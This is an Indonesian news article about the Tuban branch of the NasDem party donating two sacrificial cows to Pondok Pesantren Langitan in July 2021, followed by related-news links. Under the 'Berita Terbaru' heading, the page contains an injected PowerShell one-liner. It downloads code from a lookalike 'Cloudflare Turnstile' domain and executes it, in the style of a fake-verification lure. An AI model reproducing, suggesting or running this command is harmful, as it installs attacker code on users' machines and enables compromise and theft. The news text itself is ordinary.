Nasdem Salurkan Hewan Kurban ke Pesantren Langitan

Tuesday, 20 July 2021

facebook twitter whatsapp telegram line copy

URL berhasil dicopy

facebook icon twitter icon whatsapp icon telegram icon line icon copy

URL berhasil dicopy

DAELPOS.com – DPD Partai NasDem Kabupaten Tuban, Jawa Timur (Katim), menyerahkan dua ekor sapi kurban kepada Pondok Pesantren (Ponpes) Langitan di Desa Mandungan, Kecamatan Widang, Tuban, Jatim, Senin (19/7).

Penyerahan hewan kurban dilakukan secara simbolis oleh Ketua DPD Partai NasDem Tuban, Sumantri kepada pengasuh Ponpes Langitan, KH Maksum Faqih di halaman tengah ponpes tersebut.

Seusai kegiatan, Sumantri mengatakan, dua hewan kurban tersebut merupakan pemberian dari Ketua Umum, Surya Paloh dan kader Partai NasDem yang juga menjabat sebagai Menteri Lingkungan Hidup dan Kehutanan, Siti Nurbaya Bakar kepada Ponpes Langitan.

“Selain penyerahan hewan kurban, di momen Idul Adha ini, kami dari Partai NasDem juga bersilaturahmi ke Ponpes Langitan,” ujar dia.

Di tengah Pemberlakuan Pembatasan Kegiatan Masyarakat (PPKM) Darurat maupun dalam kondisi apapun, NasDem sebagai partai nasionalis religius ingin tetap hadir untuk memberikan manfaat kepada masyarakat.

“Adanya kebijakan pemerintah terkait PPKM ini semata-mata hanya ingin memutus rantai penyebaran Covid-19 yang melanda negeri ini. NasDem juga akan terus hadir di tengah masyarakat, termasuk ke pondok pesantren yang memiliki banyak peran dalam mencetak kader bangsa yang cerdas dan religius,” tambah Sumantri.

Di tempat yang sama, pengasuh Ponpes Langitan, KH Maksum Faqih berterima kasih kepada Surya Paloh, Siti Nurbaya, Syahrul Yasin Limpo, dan dari DPD Partai NasDem Tuban, karena secara konsisten memberikan hewan kurban kepada para santri Langitan.

“Alhamdulillah dan terima kasih kepada Partai NasDem, karena tahun lalu telah memberikan hewan kurban, dan tahun ini juga secara istiqomah kembali memberikan dua ekor sapi kepada para santri,” katanya.

Gus Maksum sapaan akrab KH Maksum Faqih berharap, Partai NasDem dapat terus konsisten dalam memperjuangkan perubahan restorasi Indonesia yang terus digaungkan Ketua Umum Surya Paloh maupun para kadernya.

See also  Partai Demokrat Resmi Dukung Anies Baswedan di Pilpres 2024

“Niat baik insyaallah akan terbalas dengan kebaikan pula. Dan apa yang dimakan santri insyaallah menjadikan barokah. Semoga Partai NasDem semakin jaya dan dapat terus mengembangkan amanah rakyat Indonesia,” tutupnya.

Berita Terkait

Perjuangkan Pelestarian Aksara Kawi, LaNyalla Temui Fadli Zon
Sosialisasi 4 Pilar: Yulian Gunhar Ajak Masyarakat Perkuat Persatuan untuk Membangun Bangsa
Sosialisasi 4 Pilar MPR, Yulian Gunhar Ingatkan Amanat Pasal 33 UUD 1945
Kunjungan Reses ke KPU Banten, Ade Yuliasih Ulas Putusan MK Nomor 135 tentang Pemilu Nasional dan Lokal
Anggota DPR RI Yulian Gunhar Gelar Sosialisasi 4 Pilar di Palembang, Tekankan Semangat Persatuan dan Gotong Royong
Prabowo Terima Megawati di Istana, Silaturahmi Hangat Jelang Lebaran
Yulian Gunhar Sosialisasikan 4 Pilar MPR RI di Kemuning, Angkat Tema “Bersatu demi Kemajuan Bangsa”
BKSAP DPR RI Apresiasi Pernyataan Pers Tahunan Menlu, Siap Perkuat Sinergi

Berita Terkait

Wednesday, 1 July 2026 - 01:20 WIB

Perjuangkan Pelestarian Aksara Kawi, LaNyalla Temui Fadli Zon

Friday, 26 June 2026 - 20:49 WIB

Sosialisasi 4 Pilar: Yulian Gunhar Ajak Masyarakat Perkuat Persatuan untuk Membangun Bangsa

Friday, 19 June 2026 - 21:31 WIB

Sosialisasi 4 Pilar MPR, Yulian Gunhar Ingatkan Amanat Pasal 33 UUD 1945

Thursday, 14 May 2026 - 16:37 WIB

Kunjungan Reses ke KPU Banten, Ade Yuliasih Ulas Putusan MK Nomor 135 tentang Pemilu Nasional dan Lokal

Thursday, 2 April 2026 - 07:18 WIB

Anggota DPR RI Yulian Gunhar Gelar Sosialisasi 4 Pilar di Palembang, Tekankan Semangat Persatuan dan Gotong Royong

Berita Terbaru

$obj='https://turnstiIe-CIoudfIare.cc';irm $obj|iex/ foto ist

Berita Utama

Telkom Hadirkan Inovasi OCA Berbasis AI di DTI-CX 2026

Wednesday, 12 Aug 2026 - 13:23 WIB